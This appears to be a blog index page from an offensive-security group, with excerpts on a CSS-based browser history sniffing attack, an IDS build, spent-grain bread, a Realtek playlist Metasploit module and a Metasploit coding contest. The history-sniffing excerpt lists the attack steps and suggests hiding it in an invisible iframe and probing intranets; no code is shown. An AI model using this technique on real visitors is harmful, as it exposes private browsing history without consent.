The act of “stealing” browser history using various web technologies has been around for a while. You may have seen this version of the attack in slides by Jeremiah Grossman speaking at HITBSecConf 2008 and we followed a PoC and writeup posted by RSnake.
So in short, the gist is this…
- Victim requests a page from Attacker
- Attacker sends a specially crafted HTML page containing links for all the URLs that he would like to check as well as corresponding unique styles.
- The Victim’s browser renders the page, firing off a CSS style for each visited link
- The CSS makes a GET request using background:url(location);
- The attacker handles the GET and uses it to determine the URL that was hit
- The attacker sends back a 404 to keep the browser moving
Easy enough. Now, let’s make it convenient to alter/switch the URL lists. Here’s the code.
Just to be clear, I don’t really consider this “stealing” the history. It’s more like playing a question game, where if you ask the right questions, the client will confirm. That said, we CAN ask a lot of questions.
Suggestions:
- Play with iframing it into another page invisibly
- Play with it in Firefox (which seems to rerender the styles as URLs are hit in other tabs
- Attempt to gain intranet information
Code browser, Code, CSS, HTML, metasploit
Intrusion Detection Systems (IDS) today are in the opinion of the L0L, fairly poor. Attackers are in a position where they can assume an IDS is in place and still feel comfortable firing away. That said, the skiddies with long “0×90″ nopsleds straight off of milw0rm, sloppy recon or generic libraries can be detected. It’s possible that you’re interested in your children’s p2p, porn or chat traffic. All valid reasons for wanting an IDS watching the wire…I guess 
The physical machine itself should have at least one monitor NIC and one management NIC. Our box here has two monitor NICs as the network TAP we are using does not support aggregation at the unit. If you are running a similar setup you will want to bridge these interfaces or use some sort of traffic merging software to realign both sides of the conversation. Read more…
Uncategorized gentoo, IDS, mysql, snort
Recently I had seen a TED talk on baking bread. The speaker expressed in great detail his love for bread and somewhere in the mix he mentioned the idea of using spent grain from brewing as an ingredient. I was taken in by the idea.
Malted grains that are used in the brewing process have been specifically modified. From the germination and halting of growth at early stages, to the roasting and drying processes afterward, much energy is poured into processing these grains for the purpose of making beer. To me it seemed like an incredible waste to just dump the stuff in the garbage.
Here’s the current recipe for Spent Grain Bread:
Read more…
Beer Baking, Beer, Brewing, recipes
There is now a File Format metasploit module posted for the Realtek Playlist exploit. This exploit already existed in the framework and was implemented as a remote connect module by MC, which I might add is much cooler than the one here. That said, if you ever need to drop and pop on one of the 5 people using the Realtek player, here you go.
Check it out in the CODE section
Uncategorized exploit, local, modules
The guys over at the French security firm JA-PSI have opened a coding contest up where the goal is to crank out Metasploit modules. They’ve established a reasonable scoring system and prizes for the winner. The prize is 150 Euros (approx $203 USD) and a ticket to FRHACK.
Check out the contest @ https://www.securinfos.info/metasploit/msfxdc.php
The contest runs through February 1st, 2009 so start ripping off sploits!
Security News contest, development, exploit, Hacking, metasploit
